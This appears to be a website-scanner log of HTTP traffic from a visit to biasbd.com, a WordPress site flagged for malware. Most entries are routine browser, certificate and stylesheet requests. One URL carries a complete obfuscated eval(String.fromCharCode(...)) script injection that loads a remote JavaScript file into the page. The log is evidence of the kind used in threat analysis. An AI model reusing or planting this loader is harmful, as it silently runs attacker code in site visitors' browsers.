firefox.settings.services.mozilla.com/v1/
143.204.55.27 200 OK 939 B URL HTTP/1.1 firefox.settings.services.mozilla.com/v1/
IP 143.204.55.27:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 2d12f67fe57a87e7366b662d153a5582
d7b02d81cc74f24a251d9363e0f4b0a149264ec1
73c273c0b5a2de3cb970b8e8c187999d3b55e760dc7766dab4bb76428d19b551
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Content-Type, Retry-After, Alert
Cache-Control: max-age=3600
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Tue, 04 Oct 2022 07:29:42 GMT
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 1ca0323262515c9240c58fe69a9ac826.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: hyliLXTcNbYI7_nXEiXrTs2GbwUc5dp2P49V4fAJ-7KgBbEtxPRZ2Q==
Age: 3253
r3.o.lencr.org/
23.36.77.32 200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash eabb7d9ffae717f7305d63c057755470
3b7f0baccfdbb8d9ffefa4a2215d4d6094be454a
ab48f17e54075e1ecf034278e82bcacd2e3689773186cc84fba9b79aac907294
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "AB48F17E54075E1ECF034278E82BCACD2E3689773186CC84FBA9B79AAC907294"
Last-Modified: Tue, 04 Oct 2022 00:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=6969
Expires: Tue, 04 Oct 2022 10:20:04 GMT
Date: Tue, 04 Oct 2022 08:23:55 GMT
Connection: keep-alive
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain
143.204.55.49 200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain
IP 143.204.55.49:0
File type PEM certificate\012- , ASCII text
Hash 6113f8408c59aebe188d6af273b90743
7398873bf00f99944eaa77ad3ebc0d43c23dba6b
b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: binary/octet-stream
content-length: 5348
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Tue, 04 Oct 2022 05:28:28 GMT
etag: "6113f8408c59aebe188d6af273b90743"
x-cache: Hit from cloudfront
via: 1.1 71c98156ae29b36a903974f9dd2568f8.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: F1J2EwrIUxViCtKksGnPLaJ8KXYDHrdLHpitiXLlVMVzJ13a8jYX0w==
age: 10528
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239 200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Tue, 04 Oct 2022 08:23:55 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
143.204.55.27 200 OK 329 B URL HTTP/1.1 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 143.204.55.27:0
File type JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Date: Tue, 04 Oct 2022 07:29:33 GMT
Cache-Control: max-age=3600, max-age=3600
Expires: Tue, 04 Oct 2022 08:26:00 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 095562e8748e634f880ee3c4ada2b6d0.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: YQLjaZxtxBRntSo8duieVh4NyABuTEHtyAasI7B7AGVxl3WLcJxmtQ==
Age: 3262
biasbd.com/ssr-on-demands
111.221.45.32 200 OK 20 kB URL HTTP/1.1 biasbd.com/ssr-on-demands
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (16918), with CRLF, LF line terminators
Hash 00620bb1fd8b9f3ac7eb87952ceb729f
29a76050197a765b51a2017a20004115065048cf
ca39739be3de62a4f662a3ac4c3e74a11bce0777a016c25cd92a3c18a727d474
Analyzer Verdict Alert fortinet Malware
GET /ssr-on-demands HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
last-modified: Tue, 04 Oct 2022 08:23:55 GMT
etag: "44fd4f9c7013569ed0cc90afc9f3dee5"
content-type: text/html; charset=UTF-8
content-length: 19529
content-encoding: gzip
vary: Accept-Encoding
date: Tue, 04 Oct 2022 08:23:55 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
ocsp.digicert.com/
93.184.220.29 200 OK 471 B IP 93.184.220.29:0
Hash 321fa9a78e31dcb66601ac5890bfba73
c325580db79bde6fd00d2d0c7e3f675e4c0046bb
83029b324b4c36522ae47eef9614c124b0ad2994de412d7ea82f990ad8ae9d92
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 3677
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:56 GMT
Last-Modified: Tue, 04 Oct 2022 07:22:39 GMT
Server: ECS (ska/F712)
X-Cache: HIT
Content-Length: 471
static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%2
0114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
172.67.20.217404 Not Found 764 B URL HTTP/1.1 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20
114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 172.67.20.217:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, ASCII text, with very long lines (2986)
Hash e0b278a03f3c0916a366ea6e39a232c7
c383e5fa69a1cf6016560cb0aa9f17be5b699bea
22d617e43c0296250a3e4b524c3672329157563a5b5f065f4f7d0e8b5ea78e40
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%2
0112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://biasbd.com/
HTTP/1.1 404 Not Found
Date: Tue, 04 Oct 2022 08:23:56 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: Zotabox
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET,POST
Content-Security-Policy: default-src 'none'
X-Content-Type-Options: nosniff
Content-Encoding: gzip
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 754c84aedda50b65-OSL
biasbd.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2.16
111.221.45.32 200 OK 4.8 kB URL HTTP/1.1 biasbd.com/wp-includes/css/dist/block-library/style.min.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (29271), with no line terminators
Hash 35b331de30552ae69d5fb5e0770613d8
b2208e9cbf8741e7dea99ac2135c16b6fab04ed1
34eba544a0c7e66ad8abad918878b0e561f43708dfe240513aa4331c81e0c9e4
GET /wp-includes/css/dist/block-library/style.min.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Thu, 15 Apr 2021 13:19:39 GMT
etag: "7257-60783d6b-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 4780
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7
111.221.45.32 200 OK 924 B URL HTTP/1.1 biasbd.com/wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with very long lines (4166)
Hash 35d69fda83362d1bb1fd562889dbafec
e6e85c0c5618044b338a7f0cc1770e79142619b4
9478b7e8de8615eb26bff7009d774649817b69736b047b7e654e645a0927d18d
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/css/blocks/style.css?ver=3.6.7 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Thu, 10 Mar 2022 19:31:35 GMT
etag: "18da-622a5217-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 924
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
biasbd.com/wp-content/themes/industrial/js/owlcarousel/assets/owl.carousel.css?ver=5.2.16
111.221.45.32 200 OK 1.1 kB URL HTTP/1.1 biasbd.com/wp-content/themes/industrial/js/owlcarousel/assets/owl.carousel.css?ver=5.2.16
IP 111.221.45.32:0
ASN #38001 NewMedia Express Pte Ltd
File type ASCII text, with CRLF line terminators
Hash d5b8a7aca62b185ed81766afe2345389
f736472969a5e2a9396e5f84be9b50e014c6e213
ea1cef87c03af1dc5a2e1e91b9d155ba113a36e1f5ee756c259b0ff978385855
Analyzer Verdict Alert fortinet Malware
GET /wp-content/themes/industrial/js/owlcarousel/assets/owl.carousel.css?ver=5.2.16 HTTP/1.1
Host: biasbd.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://biasbd.com/ssr-on-demands
Connection: keep-alive
HTTP/1.1 200 OK
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: public, max-age=31536000
expires: Wed, 04 Oct 2023 08:23:56 GMT
content-type: text/css
last-modified: Mon, 07 Mar 2016 07:01:44 GMT
etag: "12de-56dd2758-0;gz"
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 1106
date: Tue, 04 Oct 2022 08:23:56 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
access-control-allow-origin: *
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 9e40b2c69615f45f2bc898334ab3e343
6a569648ed10564e126d3bbf3f91352e6b3f6d4f
4f1d0982c58b9bbeaa266b99292baa1a00c9e39280f73d5a525722c851e15981
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:56 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
push.services.mozilla.com/
35.164.183.116 101 Switching Protocols 0 B URL HTTP/1.1 push.services.mozilla.com/
IP 35.164.183.116:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: Phr/whBU8cMOvwFBFGoOow==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: zZx9fzylN6id7MCYmtXb9bi88ss=
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 9e40b2c69615f45f2bc898334ab3e343
6a569648ed10564e126d3bbf3f91352e6b3f6d4f
4f1d0982c58b9bbeaa266b99292baa1a00c9e39280f73d5a525722c851e15981
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:56 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 471 B IP 142.250.74.3:0
Hash 9e40b2c69615f45f2bc898334ab3e343
6a569648ed10564e126d3bbf3f91352e6b3f6d4f
4f1d0982c58b9bbeaa266b99292baa1a00c9e39280f73d5a525722c851e15981
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Tue, 04 Oct 2022 08:23:56 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
